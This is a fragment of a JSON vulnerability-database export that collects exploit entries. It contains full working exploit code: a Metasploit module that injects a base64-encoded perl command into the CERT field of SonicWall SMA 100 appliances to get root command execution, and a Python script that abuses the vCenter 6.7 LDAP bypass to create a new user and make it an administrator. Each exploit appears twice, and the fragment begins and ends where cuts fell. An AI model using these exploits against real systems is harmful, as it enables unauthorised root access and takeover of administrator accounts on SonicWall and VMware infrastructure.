datastore['PASSWORD'], \n'domain' => datastore['SWDOMAIN'], \n'portalname' => datastore['PORTALNAME'], \n'login' => 'true', \n'verifyCert' => '0', \n'ajax' => 'true' \n}, \n'keep_cookies' => true \n}) \n \nfail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200 \nfail_with(Failure::NoAccess, 'Login failed') unless res.get_cookies.include?('swap=') \nprint_good('Authentication successful') \nend \n \n## \n# Send the exploit in the \"CERT\" field when \"deleting\" a 
certificate. The \n# backend requires the payload start with \"n\". Also, there is a very small \n# amount of space to fit the command into (otherwise we'll trigger a bof). \n# Finally! The command has a lot of disallowed characters: /$&|>;`^. Which \n# is problematically for basically all the payloads. The system also is \n# missing useful tools like wget, base64, and curl (10.2 has curl but \n# whatever). As such, it seemed the easiest thing to do is wrap the entire \n# command in base64 and then use perl to decode/execute it. \n## \ndef execute_command(cmd, _opts = {}) \ncmd_encoded = Rex::Text.encode_base64(cmd) \nperl_eval = \"n\\nperl -MMIME::Base64 -e 'system(decode_base64(\\\"#{cmd_encoded}\\\"))'\" \n \nmultipart_form = Rex::MIME::Message.new \nmultipart_form.add_part('delete', nil, nil, 'form-data; name=\"buttontype\"') \nmultipart_form.add_part(perl_eval, nil, nil, 'form-data; name=\"CERT\"') \nres = send_request_cgi({ \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/cgi-bin/viewcert'), \n'agent' => 'SonicWALL Mobile Connect', \n'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\", \n'data' => multipart_form.to_s \n}, 5) \n \nif res && res.code != 200 \n# the response should always be 200, unless meterpreter holds the \n# connection open. 
\nfail_with(Failure::UnexpectedReply, 'Only expected 200 OK') \nend \nend \n \ndef exploit \nprint_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\") \nlogin \nexecute_cmdstager(linemax: 40) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/165563/sonicwall_cve_2021_20039.rb.txt", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-06-03T02:50:14", "description": "", "published": "2020-06-02T00:00:00", "type": "packetstorm", "title": "VMware vCenter Server 6.7 Authentication Bypass", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-3592", "CVE-2020-3952"], "modified": "2020-06-02T00:00:00", "id": "PACKETSTORM:157896", "href": "https://packetstormsecurity.com/files/157896/VMware-vCenter-Server-6.7-Authentication-Bypass.html", "sourceData": "`# Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass \n# Date: 2020-06-01 \n# Exploit Author: Photubias \n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html \n# Version: vCenter Server 6.7 before update 3f \n# Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0) \n# CVE: CVE-2020-3952 \n \n#!/usr/bin/env python3 \n \n''' \nCopyright 2020 Photubias(c) \nThis program is free software: you can redistribute it and/or modify \nit under the terms of the GNU General Public License as published by \nthe Free Software Foundation, either version 3 of the License, or \n(at your option) any later version. \n \nThis program is distributed in the hope that it will be useful, \nbut WITHOUT ANY WARRANTY; without even the implied warranty of \nMERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the \nGNU General Public License for more details. \n \nYou should have received a copy of the GNU General Public License \nalong with this program. If not, see <http://www.gnu.org/licenses/>. 
\n \nBased (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952 \n \nFile name CVE-2020-3592.py \nwritten by tijl[dot]deneut[at]howest[dot]be for www.ic4.be \n \n## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x \n \nThis is a native implementation without requirements, written in Python 3. \nWorks equally well on Windows as Linux (as MacOS, probably ;-) \n \nFeatures: exploit + vulnerability checker \n''' \n \nimport binascii, socket, sys, string, random \n \n## Default vars; change at will \n_sIP = '192.168.50.35' \n_iPORT = 389 \n_iTIMEOUT = 5 \n \ndef randomString(iStringLength=8): \n#sLetters = string.ascii_lowercase \nsLetters = string.ascii_letters \nreturn ''.join(random.choice(sLetters) for i in range(iStringLength)) \n \ndef getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified \n## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed \nsReturn = sPrefix \nif (len(sData) / 2 ) > 255: \nsReturn += b'82' \nhexBytes = 2 \nelif (len(sData) /2 ) >= 128: \nsReturn += b'81' \nsReturn += f\"{int(len(sData)/2):#0{(hexBytes*2)+2}x}\"[2:].encode() \nreturn sReturn \n \ndef buildBindRequestPacket(sUser, sPass): \nsUser = binascii.hexlify(sUser.encode()) \nsPass = binascii.hexlify(sPass.encode()) \n## Packet Construction \nsPacket = getLengthPrefix(sPass, b'80') + sPass \nsPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket \nsPacket = b'020103' + sPacket \nsPacket = getLengthPrefix(sPacket, b'60') + sPacket \nsPacket = b'020101' + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \n#print(sPacket) \nreturn binascii.unhexlify(sPacket) \n \ndef buildUserCreatePacket(sUser, sPass): \nsUser = binascii.hexlify(sUser.encode()) \nsPass = binascii.hexlify(sPass.encode()) \ndef createAttribute(sName, sValue): \nsValue = getLengthPrefix(sValue, b'04') + sValue \nsName = getLengthPrefix(sName, b'04') + sName \n \nsReturn = 
getLengthPrefix(sValue, b'31') + sValue \nsReturn = sName + sReturn \nsReturn = getLengthPrefix(sReturn, b'30') + sReturn \nreturn sReturn \n \ndef createObjectClass(): \nsReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top') \nsReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person') \nsReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson') \nsReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user') \n \nsReturn = getLengthPrefix(sReturn, b'31') + sReturn \nsReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn \nsReturn = getLengthPrefix(sReturn, b'30') + sReturn \nreturn sReturn \n \n## Attributes \nsAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True')) \nsAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL')) \nsAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser) \nsAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser) \nsAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local')) \nsAttributes += createAttribute(binascii.hexlify(b'cn'), sUser) \nsAttributes += createAttribute(binascii.hexlify(b'uid'), sUser) \nsAttributes += createObjectClass() \nsAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass) \n## CN \nsCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local') \nsUserEntry = getLengthPrefix(sCN, b'04') + sCN \n \n## Packet Assembly (bottom up) \nsPacket = getLengthPrefix(sAttributes, b'30') + sAttributes \nsPacket = sUserEntry + sPacket \nsPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \n#print(sPacket) \nreturn binascii.unhexlify(sPacket) \n \ndef 
buildModifyUserPacket(sUser): \nsFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode()) \nsCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local') \nsMember = binascii.hexlify(b'member') \n## Packet Construction \nsPacket = getLengthPrefix(sFQDN, b'04') + sFQDN \nsPacket = getLengthPrefix(sPacket, b'31') + sPacket \nsPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket \nsPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \nsPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket \nsPacket = getLengthPrefix(sPacket, b'02010366') + sPacket \nsPacket = getLengthPrefix(sPacket, b'30') + sPacket \n#print(sPacket) \nreturn binascii.unhexlify(sPacket) \n \ndef performBind(s): \n## Trying to bind, fails, but necessary (even fails when using correct credentials) \ndPacket = buildBindRequestPacket('Administrator@vsphere.local','www.IC4.be') \ns.send(dPacket) \nsResponse = s.recv(1024) \ntry: \nsResponse = sResponse.split(b'\\x04\\x00')[0][-1:] \nsCode = binascii.hexlify(sResponse).decode() \nif sCode == '31': print('[+] Ok, service reachable, continuing') \nelse: print('[-] Something went wrong') \nexcept: \npass \nreturn sCode \n \ndef performUserAdd(s, sUser, sPass): \ndPacket = buildUserCreatePacket(sUser,sPass) \ns.send(dPacket) \nsResponse = s.recv(1024) \ntry: \nsCode = sResponse.split(b'\\x04\\x00')[0][-1:] \nsMessage = sResponse.split(b'\\x04\\x00')[1] \nif sCode == b'\\x00': \nprint('[+] Success! 
User ' + sUser + '@vsphere.local added with password ' + sPass) \nelif sCode == b'\\x32': \nprint('[-] Error, this host is not vulnerable (insufficientAccessRights)') \nelse: \nif sMessage[2] == b'81': sMessage = sMessage[3:].decode() \nelse: sMessage = sMessage[2:].decode() \nprint('[-] Error, user not added, message received: ' + sMessage) \nexcept: \npass \nreturn sCode \n \n \ndef performUserMod(s, sUser, verbose = True): \ndPacket = buildModifyUserPacket(sUser) \ns.send(dPacket) \nsResponse = s.recv(1024) \ntry: \nsCode = sResponse.split(b'\\x04\\x00')[0][-1:] \nsMessage = sResponse.split(b'\\x04\\x00')[1] \nif sCode == b'\\x00': \nif verbose: print('[+] User modification success (if the above is OK).') \nelse: \nif sMessage[2] == b'81': sMessage = sMessage[3:].decode() \nelse: sMessage = sMessage[2:].decode() \nif verbose: print('[-] Error during modification, message received: ' + sMessage) \nexcept: \npass \nreturn sCode, sMessage \n \ndef performUnbind(s): \ntry: s.send(b'\\x30\\x05\\x02\\x01\\x04\\x42\\x00') \nexcept: pass \n \ndef main(): \nglobal _sIP, _iPORT, _iTIMEOUT \n_sUSER = 'user_' + randomString(6) \n_sPASS = randomString(8) + '_2020' \nbAdduser = False \nif len(sys.argv) == 1: \nprint('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]') \nprint(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS) \nprint(' Leave username & password empty for a vulnerability check') \nprint(' Watch out for vCenter/LDAP password requirements, leave empty for random password') \nprint(' But for now, I will ask questions') \nsAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ') \nif not sAnswer == '': _sIP = sAnswer \nsAnswer = input('[?] Want to perform a check only? [Y/n]: ') \nif sAnswer.lower() == 'n': bAdduser = True \nif bAdduser: \nsAnswer = input('[?] Please enter the new username to add [' + _sUSER + ']: ') \nif not sAnswer == '': _sUSER = sAnswer \nsAnswer = input('[?] 
Please enter the new password for this user [' + _sPASS + ']: ') \nif not sAnswer == '': _sPASS = sAnswer \nelse: \n_sIP = sys.argv[1] \nif len(sys.argv) >= 3: \n_sUSER = sys.argv[2] \nbAdduser = True \nif len(sys.argv) >= 4: _sPASS = sys.argv[3] \n \n## MAIN \nprint('') \ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM) \ns.settimeout(_iTIMEOUT) \ntry: \ns.connect((_sIP,_iPORT)) \nexcept: \nprint('[-] Error: Host ' + _sIP + ':' + str(_iPORT) + ' not reachable') \nsys.exit(1) \n \nperformBind(s) \n \nif bAdduser: \nsCode = performUserAdd(s, _sUSER, _sPASS) \n \nif not bAdduser: \nprint('[!] Checking vulnerability') \nsCode, sMessage = performUserMod(s, 'Administrator', False) \nif sCode == b'\\x32': print('[-] This host is not vulnerable, message: ' + sMessage) \nelse: print('[+] This host is vulnerable!') \nelse: \nsCode = performUserMod(s, _sUSER) \n \nperformUnbind(s) \n \ns.close() \n \n \nif __name__ == \"__main__\": \nmain() \n`\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/157896/vmwarevcenter67-bypass.txt"}], "zdt": [{"lastseen": "2022-01-14T01:40:28", "description": "This Metasploit module exploits an authenticated command injection vulnerability in the SonicWall SMA 100 series web interface. Exploitation results in command execution as root. 
The affected versions are 10.2.1.2-24sv and below, 10.2.0.8-37sv and below, and 9.0.0.11-31sv and below.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-01-13T00:00:00", "type": "zdt", "title": "SonicWall SMA 100 Series Authenticated Command Injection Exploit", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20039", "CVE-2021-20038"], "modified": "2022-01-13T00:00:00", "id": "1337DAY-ID-37230", "href": "https://0day.today/exploit/description/37230", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n prepend Msf::Exploit::Remote::AutoCheck\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'SonicWall SMA 100 Series Authenticated Command Injection',\n 'Description' => %q{\n This module exploits an authenticated command injection vulnerability\n in the SonicWall SMA 100 series web interface. 
Exploitation results in\n command execution as root. The affected versions are:\n\n - 10.2.1.2-24sv and below\n - 10.2.0.8-37sv and below\n - 9.0.0.11-31sv and below\n },\n 'License' => MSF_LICENSE,\n 'Author' => [\n 'jbaines-r7' # Vulnerability discovery and Metasploit module\n ],\n 'References' => [\n [ 'CVE', '2021-20039' ],\n [ 'URL', 'https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0026'],\n [ 'URL', 'https://www.rapid7.com/blog/post/2022/01/11/cve-2021-20038-42-sonicwall-sma-100-multiple-vulnerabilities-fixed-2'],\n [ 'URL', 'https://attackerkb.com/topics/9szJhq46lw/cve-2021-20039/rapid7-analysis']\n ],\n 'DisclosureDate' => '2021-12-14',\n 'Platform' => ['linux'],\n 'Arch' => [ARCH_X86],\n 'Privileged' => true,\n 'Targets' => [\n [\n 'Linux Dropper',\n {\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86],\n 'Type' => :linux_dropper,\n 'CmdStagerFlavor' => [ 'echo', 'printf' ]\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'DefaultOptions' => {\n 'RPORT' => 443,\n 'SSL' => true,\n 'PrependFork' => true\n },\n 'Notes' => {\n 'Stability' => [CRASH_SAFE],\n 'Reliability' => [REPEATABLE_SESSION],\n 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK ]\n }\n )\n )\n register_options([\n OptString.new('TARGETURI', [true, 'Base path', '/']),\n OptString.new('USERNAME', [true, 'The username to authenticate with', 'admin']),\n OptString.new('PASSWORD', [true, 'The password to authenticate with', 'password']),\n OptString.new('SWDOMAIN', [true, 'The domain to log in to', 'LocalDomain']),\n OptString.new('PORTALNAME', [true, 'The portal to log in to', 'VirtualOffice'])\n ])\n end\n\n ##\n # Extract the version number from a javascript include in the login landing page.\n # And compare the version against known affected. 
Affected versions are:\n #\n # 10.2.1.2-24sv and below\n # 10.2.0.8-37sv and below\n # 9.0.0.11-31sv and below\n ##\n def check\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, '/cgi-bin/welcome'),\n 'agent' => 'SonicWALL Mobile Connect'\n })\n return CheckCode::Unknown('Failed to retrieve the version information') unless res&.code == 200\n\n version = res.body.match(/\\.([0-9.\\-a-z]+)\\.js\" type=/)\n return CheckCode::Unknown('Failed to retrieve the version information') unless version\n\n version = version[1]\n\n major, minor, revision, build = version.split('.', 4)\n build, point = build.split('-', 2)\n print_status(\"Version found: #{major}.#{minor}.#{revision}.#{build}-#{point}\")\n point.delete_suffix('sv')\n\n case major\n when '9'\n return CheckCode::Safe unless minor.to_i == 0 && revision.to_i == 0 && build.to_i <= 11 && point.to_i <= 31\n when '10'\n return CheckCode::Safe unless minor.to_i == 2\n\n case revision\n when '0'\n return CheckCode::Safe unless build.to_i <= 8 && point.to_i <= 37\n when '1'\n return CheckCode::Safe unless build.to_i <= 2 && point.to_i <= 24\n else\n return CheckCode::Safe\n end\n else\n return CheckCode::Safe\n end\n CheckCode::Appears('Based on the discovered version.')\n end\n\n def login\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/cgi-bin/userLogin'),\n 'agent' => 'SonicWALL Mobile Connect',\n 'vars_post' =>\n {\n 'username' => datastore['USERNAME'],\n 'password' => datastore['PASSWORD'],\n 'domain' => datastore['SWDOMAIN'],\n 'portalname' => datastore['PORTALNAME'],\n 'login' => 'true',\n 'verifyCert' => '0',\n 'ajax' => 'true'\n },\n 'keep_cookies' => true\n })\n\n fail_with(Failure::UnexpectedReply, 'Login failed') unless res&.code == 200\n fail_with(Failure::NoAccess, 'Login failed') unless res.get_cookies.include?('swap=')\n print_good('Authentication successful')\n end\n\n ##\n # Send the exploit in the \"CERT\" field when \"deleting\" a 
certificate. The\n # backend requires the payload start with \"n\". Also, there is a very small\n # amount of space to fit the command into (otherwise we'll trigger a bof).\n # Finally! The command has a lot of disallowed characters: /$&|>;`^. Which\n # is problematically for basically all the payloads. The system also is\n # missing useful tools like wget, base64, and curl (10.2 has curl but\n # whatever). As such, it seemed the easiest thing to do is wrap the entire\n # command in base64 and then use perl to decode/execute it.\n ##\n def execute_command(cmd, _opts = {})\n cmd_encoded = Rex::Text.encode_base64(cmd)\n perl_eval = \"n\\nperl -MMIME::Base64 -e 'system(decode_base64(\\\"#{cmd_encoded}\\\"))'\"\n\n multipart_form = Rex::MIME::Message.new\n multipart_form.add_part('delete', nil, nil, 'form-data; name=\"buttontype\"')\n multipart_form.add_part(perl_eval, nil, nil, 'form-data; name=\"CERT\"')\n res = send_request_cgi({\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, '/cgi-bin/viewcert'),\n 'agent' => 'SonicWALL Mobile Connect',\n 'ctype' => \"multipart/form-data; boundary=#{multipart_form.bound}\",\n 'data' => multipart_form.to_s\n }, 5)\n\n if res && res.code != 200\n # the response should always be 200, unless meterpreter holds the\n # connection open.\n fail_with(Failure::UnexpectedReply, 'Only expected 200 OK')\n end\n end\n\n def exploit\n print_status(\"Executing #{target.name} for #{datastore['PAYLOAD']}\")\n login\n execute_cmdstager(linemax: 40)\n end\nend\n", "sourceHref": "https://0day.today/exploit/37230", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-07-19T21:59:12", "description": "Exploit for multiple platform in category web applications", "cvss3": {}, "published": "2020-06-01T00:00:00", "type": "zdt", "title": "VMware vCenter Server 6.7 - Authentication Bypass Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2020-3952"], "modified": "2020-06-01T00:00:00", "id": 
"1337DAY-ID-34499", "href": "https://0day.today/exploit/description/34499", "sourceData": "# Exploit Title: VMware vCenter Server 6.7 - Authentication Bypass\r\n# Exploit Author: Photubias\r\n# Vendor Advisory: [1] https://www.vmware.com/security/advisories/VMSA-2020-0006.html\r\n# Version: vCenter Server 6.7 before update 3f\r\n# Tested on: vCenter Server Appliance 6.7 RTM (updated from v6.0)\r\n# CVE: CVE-2020-3952\r\n\r\n#!/usr/bin/env python3\r\n\r\n'''\r\n\tCopyright 2020 Photubias(c) \r\n This program is free software: you can redistribute it and/or modify\r\n it under the terms of the GNU General Public License as published by\r\n the Free Software Foundation, either version 3 of the License, or\r\n (at your option) any later version.\r\n\r\n This program is distributed in the hope that it will be useful,\r\n but WITHOUT ANY WARRANTY; without even the implied warranty of\r\n MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\r\n GNU General Public License for more details.\r\n\r\n You should have received a copy of the GNU General Public License\r\n along with this program. 
If not, see <http://www.gnu.org/licenses/>.\r\n \r\n Based (and reverse engineerd from): https://github.com/guardicore/vmware_vcenter_cve_2020_3952\r\n \r\n File name CVE-2020-3592.py\r\n written by tijl[dot]deneut[at]howest[dot]be for www.ic4.be\r\n \r\n ## Vulnerable setup (requirements): vCenter Server 6.7 that was upgraded from 6.x\r\n \r\n This is a native implementation without requirements, written in Python 3.\r\n Works equally well on Windows as Linux (as MacOS, probably ;-)\r\n\r\n Features: exploit + vulnerability checker\r\n'''\r\n\r\nimport binascii, socket, sys, string, random\r\n\r\n## Default vars; change at will\r\n_sIP = '192.168.50.35'\r\n_iPORT = 389\r\n_iTIMEOUT = 5\r\n\r\ndef randomString(iStringLength=8):\r\n #sLetters = string.ascii_lowercase\r\n sLetters = string.ascii_letters\r\n return ''.join(random.choice(sLetters) for i in range(iStringLength))\r\n\r\ndef getLengthPrefix(sData, sPrefix, hexBytes=1): ## sData is hexlified\r\n ## This will calculate the length of the string, and verify if an additional '81' or '82' prefix is needed\r\n sReturn = sPrefix\r\n if (len(sData) / 2 ) > 255:\r\n sReturn += b'82'\r\n hexBytes = 2\r\n elif (len(sData) /2 ) >= 128:\r\n sReturn += b'81'\r\n sReturn += f\"{int(len(sData)/2):#0{(hexBytes*2)+2}x}\"[2:].encode()\r\n return sReturn\r\n\r\ndef buildBindRequestPacket(sUser, sPass):\r\n sUser = binascii.hexlify(sUser.encode())\r\n sPass = binascii.hexlify(sPass.encode())\r\n ## Packet Construction\r\n sPacket = getLengthPrefix(sPass, b'80') + sPass\r\n sPacket = getLengthPrefix(sUser, b'04') + sUser + sPacket\r\n sPacket = b'020103' + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'60') + sPacket\r\n sPacket = b'020101' + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n #print(sPacket)\r\n return binascii.unhexlify(sPacket) \r\n\r\ndef buildUserCreatePacket(sUser, sPass):\r\n sUser = binascii.hexlify(sUser.encode())\r\n sPass = binascii.hexlify(sPass.encode())\r\n def 
createAttribute(sName, sValue):\r\n sValue = getLengthPrefix(sValue, b'04') + sValue\r\n sName = getLengthPrefix(sName, b'04') + sName\r\n \r\n sReturn = getLengthPrefix(sValue, b'31') + sValue\r\n sReturn = sName + sReturn\r\n sReturn = getLengthPrefix(sReturn, b'30') + sReturn\r\n return sReturn\r\n \r\n def createObjectClass():\r\n sReturn = getLengthPrefix(binascii.hexlify(b'top'), b'04') + binascii.hexlify(b'top')\r\n sReturn += getLengthPrefix(binascii.hexlify(b'person'), b'04') + binascii.hexlify(b'person')\r\n sReturn += getLengthPrefix(binascii.hexlify(b'organizationalPerson'), b'04') + binascii.hexlify(b'organizationalPerson')\r\n sReturn += getLengthPrefix(binascii.hexlify(b'user'), b'04') + binascii.hexlify(b'user')\r\n \r\n sReturn = getLengthPrefix(sReturn, b'31') + sReturn\r\n sReturn = getLengthPrefix(binascii.hexlify(b'objectClass'), b'04') + binascii.hexlify(b'objectClass') + sReturn\r\n sReturn = getLengthPrefix(sReturn, b'30') + sReturn\r\n return sReturn\r\n \r\n ## Attributes\r\n sAttributes = createAttribute(binascii.hexlify(b'vmwPasswordNeverExpires'), binascii.hexlify(b'True'))\r\n sAttributes += createAttribute(binascii.hexlify(b'userPrincipalName'), sUser + binascii.hexlify(b'@VSPHERE.LOCAL'))\r\n sAttributes += createAttribute(binascii.hexlify(b'sAMAccountName'), sUser)\r\n sAttributes += createAttribute(binascii.hexlify(b'givenName'), sUser)\r\n sAttributes += createAttribute(binascii.hexlify(b'sn'), binascii.hexlify(b'vsphere.local'))\r\n sAttributes += createAttribute(binascii.hexlify(b'cn'), sUser)\r\n sAttributes += createAttribute(binascii.hexlify(b'uid'), sUser)\r\n sAttributes += createObjectClass()\r\n sAttributes += createAttribute(binascii.hexlify(b'userPassword'), sPass)\r\n ## CN\r\n sCN = binascii.hexlify(b'cn=') + sUser + binascii.hexlify(b',cn=Users,dc=vsphere,dc=local')\r\n sUserEntry = getLengthPrefix(sCN, b'04') + sCN\r\n \r\n ## Packet Assembly (bottom up)\r\n sPacket = getLengthPrefix(sAttributes, b'30') + 
sAttributes\r\n sPacket = sUserEntry + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'02010268', 2) + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n #print(sPacket)\r\n return binascii.unhexlify(sPacket)\r\n\r\ndef buildModifyUserPacket(sUser):\r\n sFQDN = binascii.hexlify(('cn=' + sUser + ',cn=Users,dc=vsphere,dc=local').encode())\r\n sCN = binascii.hexlify(b'cn=Administrators,cn=Builtin,dc=vsphere,dc=local')\r\n sMember = binascii.hexlify(b'member')\r\n ## Packet Construction\r\n sPacket = getLengthPrefix(sFQDN, b'04') + sFQDN\r\n sPacket = getLengthPrefix(sPacket, b'31') + sPacket\r\n sPacket = getLengthPrefix(sMember, b'04') + sMember + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'0a010030') + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n sPacket = getLengthPrefix(sCN, b'04') + sCN + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'02010366') + sPacket\r\n sPacket = getLengthPrefix(sPacket, b'30') + sPacket\r\n #print(sPacket)\r\n return binascii.unhexlify(sPacket)\r\n\r\ndef performBind(s):\r\n ## Trying to bind, fails, but necessary (even fails when using correct credentials)\r\n dPacket = buildBindRequestPacket('Administrator@vsphere.local','www.IC4.be')\r\n s.send(dPacket)\r\n sResponse = s.recv(1024)\r\n try:\r\n sResponse = sResponse.split(b'\\x04\\x00')[0][-1:]\r\n sCode = binascii.hexlify(sResponse).decode()\r\n if sCode == '31': print('[+] Ok, service reachable, continuing')\r\n else: print('[-] Something went wrong')\r\n except:\r\n pass\r\n return sCode\r\n\r\ndef performUserAdd(s, sUser, sPass):\r\n dPacket = buildUserCreatePacket(sUser,sPass)\r\n s.send(dPacket)\r\n sResponse = s.recv(1024)\r\n try:\r\n sCode = sResponse.split(b'\\x04\\x00')[0][-1:]\r\n sMessage = sResponse.split(b'\\x04\\x00')[1]\r\n if sCode == b'\\x00':\r\n print('[+] Success! 
User ' + sUser + '@vsphere.local added with password ' + sPass)\r\n elif sCode == b'\\x32':\r\n print('[-] Error, this host is not vulnerable (insufficientAccessRights)')\r\n else:\r\n if sMessage[2] == b'81': sMessage = sMessage[3:].decode()\r\n else: sMessage = sMessage[2:].decode()\r\n print('[-] Error, user not added, message received: ' + sMessage)\r\n except:\r\n pass\r\n return sCode\r\n \r\n\r\ndef performUserMod(s, sUser, verbose = True):\r\n dPacket = buildModifyUserPacket(sUser)\r\n s.send(dPacket)\r\n sResponse = s.recv(1024)\r\n try:\r\n sCode = sResponse.split(b'\\x04\\x00')[0][-1:]\r\n sMessage = sResponse.split(b'\\x04\\x00')[1]\r\n if sCode == b'\\x00':\r\n if verbose: print('[+] User modification success (if the above is OK).')\r\n else:\r\n if sMessage[2] == b'81': sMessage = sMessage[3:].decode()\r\n else: sMessage = sMessage[2:].decode()\r\n if verbose: print('[-] Error during modification, message received: ' + sMessage)\r\n except:\r\n pass\r\n return sCode, sMessage\r\n\r\ndef performUnbind(s):\r\n try: s.send(b'\\x30\\x05\\x02\\x01\\x04\\x42\\x00')\r\n except: pass\r\n\r\ndef main():\r\n global _sIP, _iPORT, _iTIMEOUT\r\n _sUSER = 'user_' + randomString(6)\r\n _sPASS = randomString(8) + '_2020'\r\n bAdduser = False\r\n if len(sys.argv) == 1:\r\n print('[!] No arguments found: python3 CVE-2020-3592.py <dstIP> [<newUsername>] [<newPassword>]')\r\n print(' Example: ./CVE-2020-3592.py ' + _sIP + ' ' + _sUSER + ' ' + _sPASS)\r\n print(' Leave username & password empty for a vulnerability check')\r\n print(' Watch out for vCenter/LDAP password requirements, leave empty for random password')\r\n print(' But for now, I will ask questions')\r\n sAnswer = input('[?] Please enter the vCenter IP address [' + _sIP + ']: ')\r\n if not sAnswer == '': _sIP = sAnswer\r\n sAnswer = input('[?] Want to perform a check only? [Y/n]: ')\r\n if sAnswer.lower() == 'n': bAdduser = True\r\n if bAdduser:\r\n sAnswer = input('[?] 
